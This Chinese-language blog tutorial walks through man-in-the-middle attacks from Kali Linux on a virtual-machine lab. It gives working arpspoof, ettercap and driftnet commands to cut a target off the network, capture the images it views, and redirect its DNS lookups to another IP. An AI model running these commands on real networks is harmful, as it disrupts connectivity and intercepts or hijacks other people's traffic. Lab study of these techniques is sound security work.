kali攻击命令大全_中间人攻击之ARP欺骗

我不会RAP,但我会ARP——老欢

环境:

  1. 攻击机:kali linux (ip地址:192.168.204.128)
  2. 靶机:windows server 2003(IP地址:192.168.204.132)

以上均是虚拟机环境,网络模式为NAT模式

检验虚拟机之间的网络是否连通

7b4fa0680b9ce416de0461d3de7790c1.png

ARP断网攻击

在终端输入命令:arpspoof -i eth0 -t 192.168.204.132 192.168.204.2

命令解释:

-i 指定网卡

-t 指定目标ip

这里的192.168.204.2是网关

b0888f250ea88eb2e667e8d0c043a1e7.png

欺骗开始,我们来看看靶机,靶机已经无法上网,无法访问百度了。

a406e80beebafe68edb732df4b8d07be.png

接下来我们按ctrl+c停止arp欺骗,靶机又能上网了

0062f86f57477cd1d1719096e98f8496.png

2.捕获靶机浏览的图片

在终端输入命令:ettercap -i eth0 -Tq -M arp:remote /192.168.204.132// /192.168.204.2//

eth0是网卡

192.168.204.132是靶机地址

192.168.204.2是网关地址

bab0f9e68242b15a4bc9faefbb89236d.png

开启图片嗅探 driftnet -i eth0 -a -d /root/pictures
这里将嗅探到的图片存到root目录下的pictures文件夹里

接下来我们在靶机上面随便浏览一些图片,然后我们打开kali机的pictures文件夹,所有的图片已经被抓取到,所以少看不该看的图片!

63c1fe0fa767e3a8273d28afe193cedf.png

3.DNS欺骗

首先执行命令leafpad /etc/ettercap/etter.dns

在这个文件里加上这么一句 *.*.com A 39.108.146.75(这里的ip地址是403工作室的ip)

da34c46714c581608978b46c95549a7c.png

执行命令 ettercap -i eth0 -Tq -P dns_spoof /192.168.204.132// /192.168.204.2//

5bd6948e51b835a020b13c509d8328f6.png

回到靶机,在url上输人http://www.163.com来访问一下网易

f003f252d9a09e7fcd1ce9eb9462c188.png

当我回车访问那一刻,它跳转到了403工作室

db7f9004efbd3655fb6bfac6bb7fdff9.png

经过试验,这里的dns欺骗对一些大型网站不起作用,可能是做了防dns欺骗的措施

本文仅供测试娱乐,请勿用于实际环境。

中间人攻击之ARP欺骗 - 403工作室​laohuan.art
090db8ee64b3050ded9b7ed003212662.png
  • 17
    点赞
  • 111
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值